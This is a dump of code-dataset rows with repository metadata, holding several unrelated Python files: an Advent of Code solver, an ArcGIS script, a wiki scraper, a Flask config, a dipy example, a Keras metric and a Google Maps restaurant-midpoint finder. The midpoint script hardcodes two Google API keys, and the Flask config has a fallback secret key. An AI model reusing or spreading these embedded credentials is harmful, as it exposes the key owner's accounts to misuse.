hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9a58cccdc39560a0f0636cfb1a2fb77ab4085f1c | 5,384 | py | Python | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | import math
from functools import cmp_to_key
locations = """#.#................#..............#......#......
.......##..#..#....#.#.....##...#.........#.#...
.#...............#....#.##......................
......#..####.........#....#.......#..#.....#...
.....#............#......#................#.#...
....##...#.#.#.#.............#..#.#.......#.....
..#.#.........#....#..#.#.........####..........
....#...#.#...####..#..#..#.....#...............
.............#......#..........#...........#....
......#.#.........#...............#.............
..#......#..#.....##...##.....#....#.#......#...
...#.......##.........#.#..#......#........#.#..
#.............#..........#....#.#.....#.........
#......#.#................#.......#..#.#........
#..#.#.....#.....###..#.................#..#....
...............................#..........#.....
###.#.....#.....#.............#.......#....#....
.#.....#.........#.....#....#...................
........#....................#..#...............
.....#...#.##......#............#......#.....#..
..#..#..............#..#..#.##........#.........
..#.#...#.......#....##...#........#...#.#....#.
.....#.#..####...........#.##....#....#......#..
.....#..#..##...............................#...
.#....#..#......#.#............#........##...#..
.......#.....................#..#....#.....#....
#......#..###...........#.#....#......#.........
..............#..#.#...#.......#..#.#...#......#
.......#...........#.....#...#.............#.#..
..##..##.............#........#........#........
......#.............##..#.........#...#.#.#.....
#........#.........#...#.....#................#.
...#.#...........#.....#.........#......##......
..#..#...........#..........#...................
.........#..#.......................#.#.........
......#.#.#.....#...........#...............#...
......#.##...........#....#............#........
#...........##.#.#........##...........##.......
......#....#..#.......#.....#.#.......#.##......
.#....#......#..............#.......#...........
......##.#..........#..................#........
......##.##...#..#........#............#........
..#.....#.................###...#.....###.#..#..
....##...............#....#..................#..
.....#................#.#.#.......#..........#..
#........................#.##..........#....##..
.#.........#.#.#...#...#....#........#..#.......
...#..#.#......................#...............#"""
locations = list(map(list, locations.splitlines()))
asteroids = []
for i in range(len(locations)):
for j in range(len(locations[i])):
if locations[i][j] == '#':
asteroids.append((j, i))
best = find_best_asteroid(asteroids)[0]
asteroids.remove(best)
print(find_nth_removed(asteroids, best, 200))
| 37.388889 | 216 | 0.32448 | import math
from functools import cmp_to_key
def cross_product_magnitude(p, q):
return p[0]*q[1] - p[1]*q[0]
def subtract_vectors(p, q):
return (q[0]-p[0], q[1]-p[1])
def pseudo_distance(p, q):
return (q[0]-p[0])**2 + (q[1]-p[1])**2
def on_segment(p, q, r):
return (min(q[0], r[0]) <= p[0] <= max(q[0], r[0])) and (min(q[1], r[1]) <= p[1] <= max(q[1], r[1]))
def find_best_asteroid(asteroids):
best_range = -1
best = (-1, -1)
for p in asteroids:
num_of_reachable = 0
for q in asteroids:
is_colinear_with_any = False
for r in asteroids:
if ((p != q and q != r and p != r) and
cross_product_magnitude(subtract_vectors(p, q), subtract_vectors(p, r)) == 0 and
(not on_segment(p, q, r)) and
(pseudo_distance(p, q) > pseudo_distance(p, r))):
is_colinear_with_any = True
break
if not is_colinear_with_any and p != q:
num_of_reachable += 1
if num_of_reachable > best_range:
best_range = num_of_reachable
best = p
return (best, best_range)
def sort_by_angle(asteroids, reference_point):
# moves vectors to a new coordinate system where reference_point is a center
# and rotates them by 90 deg counterclockwise
def prepare_vectors(x, y):
_x = subtract_vectors(reference_point, x)
_y = subtract_vectors(reference_point, y)
return ((-_x[1], _x[0]), (-_y[1], _y[0]))
def compare_vectors(x, y):
(_x, _y) = prepare_vectors(x, y)
if _x[1] == 0 and _x[0] > 0:
return 1
elif _y[1] == 0 and _y[0] > 0:
return -1
elif _x[1] > 0 and _y[1] < 0:
return 1
elif _x[1] < 0 and _y[1] > 0:
return -1
cpm = cross_product_magnitude(_x, _y)
if cpm != 0:
return cpm
return pseudo_distance(reference_point, y) - pseudo_distance(reference_point, x)
return sorted(asteroids, key=cmp_to_key(compare_vectors))
def find_nth_removed(asteroids, reference_point, n):
_asteroids = sort_by_angle(asteroids, reference_point)
i = 1
j = 0
while i < n:
if j == len(_asteroids):
j = 0
el = _asteroids[len(_asteroids) - 1 - j]
while cross_product_magnitude(subtract_vectors(reference_point, _asteroids[len(_asteroids) - 2 - j]), subtract_vectors(reference_point, _asteroids[len(_asteroids) - 1 - j])) == 0 and j != (len(_asteroids)-1):
j += 1
_asteroids.remove(el)
i += 1
return _asteroids[len(_asteroids) - 1 - j]
locations = """#.#................#..............#......#......
.......##..#..#....#.#.....##...#.........#.#...
.#...............#....#.##......................
......#..####.........#....#.......#..#.....#...
.....#............#......#................#.#...
....##...#.#.#.#.............#..#.#.......#.....
..#.#.........#....#..#.#.........####..........
....#...#.#...####..#..#..#.....#...............
.............#......#..........#...........#....
......#.#.........#...............#.............
..#......#..#.....##...##.....#....#.#......#...
...#.......##.........#.#..#......#........#.#..
#.............#..........#....#.#.....#.........
#......#.#................#.......#..#.#........
#..#.#.....#.....###..#.................#..#....
...............................#..........#.....
###.#.....#.....#.............#.......#....#....
.#.....#.........#.....#....#...................
........#....................#..#...............
.....#...#.##......#............#......#.....#..
..#..#..............#..#..#.##........#.........
..#.#...#.......#....##...#........#...#.#....#.
.....#.#..####...........#.##....#....#......#..
.....#..#..##...............................#...
.#....#..#......#.#............#........##...#..
.......#.....................#..#....#.....#....
#......#..###...........#.#....#......#.........
..............#..#.#...#.......#..#.#...#......#
.......#...........#.....#...#.............#.#..
..##..##.............#........#........#........
......#.............##..#.........#...#.#.#.....
#........#.........#...#.....#................#.
...#.#...........#.....#.........#......##......
..#..#...........#..........#...................
.........#..#.......................#.#.........
......#.#.#.....#...........#...............#...
......#.##...........#....#............#........
#...........##.#.#........##...........##.......
......#....#..#.......#.....#.#.......#.##......
.#....#......#..............#.......#...........
......##.#..........#..................#........
......##.##...#..#........#............#........
..#.....#.................###...#.....###.#..#..
....##...............#....#..................#..
.....#................#.#.#.......#..........#..
#........................#.##..........#....##..
.#.........#.#.#...#...#....#........#..#.......
...#..#.#......................#...............#"""
locations = list(map(list, locations.splitlines()))
asteroids = []
for i in range(len(locations)):
for j in range(len(locations[i])):
if locations[i][j] == '#':
asteroids.append((j, i))
best = find_best_asteroid(asteroids)[0]
asteroids.remove(best)
print(find_nth_removed(asteroids, best, 200))
| 2,477 | 0 | 161 |
7398e9a82c0b1cc101a83ce250b039cc190777ce | 671 | py | Python | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# hillshade.py
# Created on: 2020-01-19 18:50:09.00000
# (generated by ArcGIS/ModelBuilder)
# Description:
# ---------------------------------------------------------------------------
# Import arcpy module
import arcpy
# Local variables:
yose_valley_tiles_rst05 = ""
yose_valley_rst05_hillshade = ""
# Set Geoprocessing environments
arcpy.env.scratchWorkspace = "C:\\GIS\\scratch.gdb"
arcpy.env.workspace = "C:\\GIS\\scratch.gdb"
# Process: Hillshade
arcpy.gp.HillShade_sa(yose_valley_tiles_rst05, yose_valley_rst05_hillshade, "315", "45", "NO_SHADOWS", "1")
| 27.958333 | 107 | 0.564829 | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# hillshade.py
# Created on: 2020-01-19 18:50:09.00000
# (generated by ArcGIS/ModelBuilder)
# Description:
# ---------------------------------------------------------------------------
# Import arcpy module
import arcpy
# Local variables:
yose_valley_tiles_rst05 = ""
yose_valley_rst05_hillshade = ""
# Set Geoprocessing environments
arcpy.env.scratchWorkspace = "C:\\GIS\\scratch.gdb"
arcpy.env.workspace = "C:\\GIS\\scratch.gdb"
# Process: Hillshade
arcpy.gp.HillShade_sa(yose_valley_tiles_rst05, yose_valley_rst05_hillshade, "315", "45", "NO_SHADOWS", "1")
| 0 | 0 | 0 |
8ac1f8c53296f954f48aab6990e47cd80f08f051 | 2,176 | py | Python | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | import ast
import dataclasses
import json
import re
import sys
import typing
from sbdata.repo import find_item_by_name, Item
from sbdata.task import register_task, Arguments
from sbdata.wiki import get_wiki_sources_by_title
@dataclasses.dataclass
@register_task("Fetch Dungeon Loot")
| 38.857143 | 152 | 0.560202 | import ast
import dataclasses
import json
import re
import sys
import typing
from sbdata.repo import find_item_by_name, Item
from sbdata.task import register_task, Arguments
from sbdata.wiki import get_wiki_sources_by_title
@dataclasses.dataclass
class DungeonDrop:
item: Item
floor: int
chest: str
drop_chances: dict[str, str]
def get_drop_chance(self, has_s_plus: bool, talisman_level: int, boss_luck: int):
drop_identifier = "S" + ('+' if has_s_plus else '') + 'ABCD'[talisman_level] + str(len([i for i in [0, 1, 3, 5, 10] if i >= boss_luck]))
return self.drop_chances.get(drop_identifier)
@register_task("Fetch Dungeon Loot")
def fetch_dungeon_loot(args: Arguments):
items = []
for floor in get_wiki_sources_by_title(*[f'Template:Catacombs Floor {f} Loot Master' for f in ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII']]).values():
for template in floor.filter_templates():
if template.name.strip() == 'Dungeon Chest Table/Row':
item = None
ifloor = None
chest = None
drop_chances = {}
for param in template.params:
attr_name = param.name.nodes[0].strip()
attr_value = param.value.nodes[0].strip()
if attr_name == 'item':
if item is None:
item = find_item_by_name(attr_value)
elif attr_name == 'customlink':
if item is None:
item = find_item_by_name(attr_value.split('#')[-1])
elif attr_name == 'chest':
chest = attr_value
elif attr_name == 'floor':
ifloor = int(attr_value)
elif attr_name.startswith("S"):
drop_chances[attr_name] = attr_value
if item is None or ifloor is None or chest is None:
print('WARNING: Missing data for item: ' + str(template))
else:
items.append(DungeonDrop(item, ifloor, chest, drop_chances))
return items
| 1,741 | 102 | 44 |
d16d2b5528eb5d6e162f6f01369e052c370bd458 | 940 | py | Python | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | null | null | null | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | 2 | 2020-06-12T13:48:15.000Z | 2020-06-14T20:48:43.000Z | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | null | null | null | import os
# Load environmental variables from .env in development stage
basedir = os.path.abspath(os.path.dirname(__file__))
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'staging': StagingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
} | 21.860465 | 82 | 0.768085 | import os
# Load environmental variables from .env in development stage
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
DEBUG = False
TESTING = False
CSRF_ENABLED = True
SECRET_KEY = os.environ.get('SECRET_KEY') or 'sdfhuethu39efgj!jfjegjh59s'
SQLALCHEMY_RECORD_QUERIES = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
class ProductionConfig(Config):
DEBUG = False
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class StagingConfig(Config):
DEVELOPMENT = True
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class DevelopmentConfig(Config):
DEVELOPMENT = True
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'staging': StagingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
} | 0 | 528 | 115 |
f74f2e7d8c2c0a76da0b48554337c2420d8802ee | 3,269 | py | Python | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | """
===========================
Calculate SHORE scalar maps
===========================
We show how to calculate two SHORE-based scalar maps: return to origin
probability (rtop) [Descoteaux2011]_ and mean square displacement (msd)
[Wu2007]_, [Wu2008]_ on your data. SHORE can be used with any multiple b-value
dataset like multi-shell or DSI.
First import the necessary modules:
"""
import nibabel as nib
import numpy as np
import matplotlib.pyplot as plt
from dipy.data import fetch_taiwan_ntu_dsi, read_taiwan_ntu_dsi, get_sphere
from dipy.data import get_data, dsi_voxels
from dipy.reconst.shore import ShoreModel
"""
Download and read the data for this tutorial.
"""
fetch_taiwan_ntu_dsi()
img, gtab = read_taiwan_ntu_dsi()
"""
img contains a nibabel Nifti1Image object (data) and gtab contains a GradientTable
object (gradient information e.g. b-values). For example, to read the b-values
it is possible to write print(gtab.bvals).
Load the raw diffusion data and the affine.
"""
data = img.get_data()
affine = img.affine
print('data.shape (%d, %d, %d, %d)' % data.shape)
"""
Instantiate the Model.
"""
asm = ShoreModel(gtab)
"""
Lets just use only one slice only from the data.
"""
dataslice = data[30:70, 20:80, data.shape[2] / 2]
"""
Fit the signal with the model and calculate the SHORE coefficients.
"""
asmfit = asm.fit(dataslice)
"""
Calculate the analytical rtop on the signal
that corresponds to the integral of the signal.
"""
print('Calculating... rtop_signal')
rtop_signal = asmfit.rtop_signal()
"""
Now we calculate the analytical rtop on the propagator,
that corresponds to its central value.
"""
print('Calculating... rtop_pdf')
rtop_pdf = asmfit.rtop_pdf()
"""
In theory, these two measures must be equal,
to show that we calculate the mean square error on this two measures.
"""
mse = np.sum((rtop_signal - rtop_pdf) ** 2) / rtop_signal.size
print("mse = %f" % mse)
"""
mse = 0.000000
Let's calculate the analytical mean square displacement on the propagator.
"""
print('Calculating... msd')
msd = asmfit.msd()
"""
Show the maps and save them in SHORE_maps.png.
"""
fig = plt.figure(figsize=(6, 6))
ax1 = fig.add_subplot(2, 2, 1, title='rtop_signal')
ax1.set_axis_off()
ind = ax1.imshow(rtop_signal.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax2 = fig.add_subplot(2, 2, 2, title='rtop_pdf')
ax2.set_axis_off()
ind = ax2.imshow(rtop_pdf.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax3 = fig.add_subplot(2, 2, 3, title='msd')
ax3.set_axis_off()
ind = ax3.imshow(msd.T, interpolation='nearest', origin='lower', vmin=0)
plt.colorbar(ind)
plt.savefig('SHORE_maps.png')
"""
.. figure:: SHORE_maps.png
:align: center
**rtop and msd calculated using the SHORE model**.
.. [Descoteaux2011] Descoteaux M. et. al , "Multiple q-shell diffusion
propagator imaging", Medical Image Analysis, vol 15,
No. 4, p. 603-621, 2011.
.. [Wu2007] Wu Y. et. al, "Hybrid diffusion imaging", NeuroImage, vol 36,
p. 617-629, 2007.
.. [Wu2008] Wu Y. et. al, "Computation of Diffusion Function Measures
in q -Space Using Magnetic Resonance Hybrid Diffusion Imaging",
IEEE TRANSACTIONS ON MEDICAL IMAGING, vol. 27, No. 6, p. 858-865,
2008.
.. include:: ../links_names.inc
"""
| 24.954198 | 82 | 0.707862 | """
===========================
Calculate SHORE scalar maps
===========================
We show how to calculate two SHORE-based scalar maps: return to origin
probability (rtop) [Descoteaux2011]_ and mean square displacement (msd)
[Wu2007]_, [Wu2008]_ on your data. SHORE can be used with any multiple b-value
dataset like multi-shell or DSI.
First import the necessary modules:
"""
import nibabel as nib
import numpy as np
import matplotlib.pyplot as plt
from dipy.data import fetch_taiwan_ntu_dsi, read_taiwan_ntu_dsi, get_sphere
from dipy.data import get_data, dsi_voxels
from dipy.reconst.shore import ShoreModel
"""
Download and read the data for this tutorial.
"""
fetch_taiwan_ntu_dsi()
img, gtab = read_taiwan_ntu_dsi()
"""
img contains a nibabel Nifti1Image object (data) and gtab contains a GradientTable
object (gradient information e.g. b-values). For example, to read the b-values
it is possible to write print(gtab.bvals).
Load the raw diffusion data and the affine.
"""
data = img.get_data()
affine = img.affine
print('data.shape (%d, %d, %d, %d)' % data.shape)
"""
Instantiate the Model.
"""
asm = ShoreModel(gtab)
"""
Lets just use only one slice only from the data.
"""
dataslice = data[30:70, 20:80, data.shape[2] / 2]
"""
Fit the signal with the model and calculate the SHORE coefficients.
"""
asmfit = asm.fit(dataslice)
"""
Calculate the analytical rtop on the signal
that corresponds to the integral of the signal.
"""
print('Calculating... rtop_signal')
rtop_signal = asmfit.rtop_signal()
"""
Now we calculate the analytical rtop on the propagator,
that corresponds to its central value.
"""
print('Calculating... rtop_pdf')
rtop_pdf = asmfit.rtop_pdf()
"""
In theory, these two measures must be equal,
to show that we calculate the mean square error on this two measures.
"""
mse = np.sum((rtop_signal - rtop_pdf) ** 2) / rtop_signal.size
print("mse = %f" % mse)
"""
mse = 0.000000
Let's calculate the analytical mean square displacement on the propagator.
"""
print('Calculating... msd')
msd = asmfit.msd()
"""
Show the maps and save them in SHORE_maps.png.
"""
fig = plt.figure(figsize=(6, 6))
ax1 = fig.add_subplot(2, 2, 1, title='rtop_signal')
ax1.set_axis_off()
ind = ax1.imshow(rtop_signal.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax2 = fig.add_subplot(2, 2, 2, title='rtop_pdf')
ax2.set_axis_off()
ind = ax2.imshow(rtop_pdf.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax3 = fig.add_subplot(2, 2, 3, title='msd')
ax3.set_axis_off()
ind = ax3.imshow(msd.T, interpolation='nearest', origin='lower', vmin=0)
plt.colorbar(ind)
plt.savefig('SHORE_maps.png')
"""
.. figure:: SHORE_maps.png
:align: center
**rtop and msd calculated using the SHORE model**.
.. [Descoteaux2011] Descoteaux M. et. al , "Multiple q-shell diffusion
propagator imaging", Medical Image Analysis, vol 15,
No. 4, p. 603-621, 2011.
.. [Wu2007] Wu Y. et. al, "Hybrid diffusion imaging", NeuroImage, vol 36,
p. 617-629, 2007.
.. [Wu2008] Wu Y. et. al, "Computation of Diffusion Function Measures
in q -Space Using Magnetic Resonance Hybrid Diffusion Imaging",
IEEE TRANSACTIONS ON MEDICAL IMAGING, vol. 27, No. 6, p. 858-865,
2008.
.. include:: ../links_names.inc
"""
| 0 | 0 | 0 |
eff1b57a9e80a69abc22628d9e510839c0e6ec22 | 1,006 | py | Python | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | 5 | 2019-11-26T10:59:39.000Z | 2021-05-27T22:15:16.000Z | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | 8 | 2020-03-22T23:11:59.000Z | 2022-03-12T00:19:53.000Z | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | null | null | null | from tensorflow.python.keras import backend as K
def f1_score(y_true, y_pred):
""" F1 score metric """
def recall_metric(labels, predictions):
""" Recall metric """
true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
possible_positives = K.sum(K.round(K.clip(labels, 0, 1)))
recall_score = true_positives / (possible_positives + K.epsilon())
return recall_score
def precision_metric(labels, predictions):
""" Precision metric """
true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(predictions, 0, 1)))
precision_score = true_positives / (predicted_positives + K.epsilon())
return precision_score
precision = precision_metric(y_true, y_pred)
recall = recall_metric(y_true, y_pred)
# K.epsilon() is a small number used to prevent division by zero
return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
| 38.692308 | 78 | 0.662028 | from tensorflow.python.keras import backend as K
def f1_score(y_true, y_pred):
""" F1 score metric """
def recall_metric(labels, predictions):
""" Recall metric """
true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
possible_positives = K.sum(K.round(K.clip(labels, 0, 1)))
recall_score = true_positives / (possible_positives + K.epsilon())
return recall_score
def precision_metric(labels, predictions):
""" Precision metric """
true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(predictions, 0, 1)))
precision_score = true_positives / (predicted_positives + K.epsilon())
return precision_score
precision = precision_metric(y_true, y_pred)
recall = recall_metric(y_true, y_pred)
# K.epsilon() is a small number used to prevent division by zero
return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
| 0 | 0 | 0 |
0755796f2e9b67c6de7865a300e0f85de7f62f78 | 107 | py | Python | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | null | null | null | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | 2 | 2021-08-20T11:56:47.000Z | 2022-03-31T13:56:02.000Z | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | null | null | null | from veros_extra_setups.setups.wave_propagation.wave_propagation import WavePropagationSetup # noqa: F401
| 53.5 | 106 | 0.878505 | from veros_extra_setups.setups.wave_propagation.wave_propagation import WavePropagationSetup # noqa: F401
| 0 | 0 | 0 |
e8f018045c23007c1c6196fae34071650050234b | 9,084 | py | Python | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | 3 | 2018-03-25T17:09:15.000Z | 2020-05-27T15:34:31.000Z | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | null | null | null | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | null | null | null | """Goal: Create a program where users can input two locations and return a restaurant as equidistant as possible between them.
This will be done by connecting with the GoogleMaps Directions and Places API.
Once a suitable establishment has been found, the program will return the establishment's name, address, phone number, and hours of operation.
If a restaurant can not be found within 500 meters of the midpoint, Middle Ground will automatically expand the radius to 5000 meters."""
#!/usr/bin/env python3
import requests, json, pprint
#The requests and json modules allow me to access the JSON response from the Google APIs
#pprint allows me to return the data to the user in a format that is easier to read
DIRECTIONS_API_KEY = 'AIzaSyDmLGPIUErCNSmM-FPFSUGS9LIPFv9cbRI' #GoogleMaps Directions API Key
PLACES_API_KEY = 'AIzaSyDR_0dNH_A30KWnjz3s7GG7PZw6Vo3WkDQ' #Google Places API Key
#I do not expect a lot of people to be accessing this program on GitHub currently, so I feel comfortable leaving in the API Keys and am not worried about going over the request limit.
print('Welcome to Middle Ground.\n\nPlease use the following guidelines for the best results:')
print('\n1. Make sure the addresses are spelled completely and correctly.\nAddresses are not case-sensitive and standard postal abbreviations are acceptable.')
print('\n2. Restart the program if you have made an error while typing either address.')
print('\n3. Since Middle Ground aims to find restaurants within 500 meters of the midpoint, it is best suited for use in densely populated areas.\n')
print('*****************************************************\n\n')
restart = 1
#This code gives users the option to restart the program or exit when finished
while restart != "X" and restart != "x":
street_address_a = input('Please enter the street address only of Person A. \nDo not include city or state: ')
city_a = input('Enter the city of Person A: ')
state_a = input('Enter the state of Person A: ')
updated_address_a = str(street_address_a) + ' ' + str(city_a) + ' ' + str(state_a)
street_address_b = input('\nPlease enter the street address only of Person B. \nDo not include city or state: ')
city_b = input('Enter the city of Person B: ')
state_b = input('Enter the state of Person B: ')
updated_address_b = str(street_address_b) + ' ' + str(city_b) + ' ' + str(state_b)
#Should add way for user to confirm the address is correct, with options to revise if there is a typo.
#Should add exception handling to confirm that the user's input is valid (e.g. not entering numbers or special characters instead of letters for city and state)
print('\nLet\'s find a restaurant at the midpoint of those locations!\nPlease wait... this may take a few moments.')
#I have gathered all the necessary information from the user, now I need to connect with the GoogleMaps Directions API
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_a, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_a = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_a = api_response_dict['results'][0]['geometry']['location']['lng']
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(updated_address_b, DIRECTIONS_API_KEY))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude_b = api_response_dict['results'][0]['geometry']['location']['lat']
longitude_b = api_response_dict['results'][0]['geometry']['location']['lng']
#Now that the latitude and longitude of both addresses has been pulled from the GoogleMaps Directions API, I am going to average them together to find a midpoint
average_latitude = find_average(latitude_a, latitude_b)
average_longitude = find_average(longitude_a, longitude_b)
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=500&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 500 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 500 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, I could not find a restaurant within 500 meters of the midpoint. \nI am now checking for a restaurant within 5000 meters.')
#This addition allows for more flexibility in suburban areas or if both addresses are not located in the same city.
list_places = requests.get('https://maps.googleapis.com/maps/api/place/radarsearch/json?location=' + str(average_latitude) + ',' + str(average_longitude) + '&radius=5000&type=restaurant&key=' + str(PLACES_API_KEY))
list_places_dict = list_places.json()
if list_places_dict['status'] == 'OK':
#Checking to make sure there an establishment is found within 5000 meters of the midpoint
place_id = list_places_dict['results'][0]['place_id']
#This pulls the Place ID of the first result on the list of bars and restaurants within 5000 meters of the middle point
place_details = requests.get('https://maps.googleapis.com/maps/api/place/details/json?placeid=' + str(place_id) + '&key=' + str(PLACES_API_KEY))
place_details = place_details.json()
if place_details['status'] == 'OK':
place_name = place_details['result']['name']
place_address = place_details['result']['formatted_address']
place_phone = place_details['result']['formatted_phone_number']
place_hours = place_details['result']['opening_hours']['weekday_text']
print('\nYou should meet at ' + place_name)
#This is the name of the restaurant closest to the midpoint.
print(place_address)
print(place_phone)
pprint.pprint(place_hours)
#Using pprint module to print days and hours on separate lines
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
else:
print('\nI\'m sorry, there does not appear to be a restaurant within 5000 meters of the midpoint. \nMiddle Ground is working on expanding functionality to less densely populated areas, so stay tuned for future updates!')
restart = input('\nPress ENTER to input new addresses or type X to exit.\n')
"""FUTURE IMPROVEMENTS:
- Give users the choice to input restaurant, bar, cafe, museum, or any of the other supported "types" on the Google Places API
- Return a list of establishment choices, with options to rank by distance from midpoint or Yelp rating
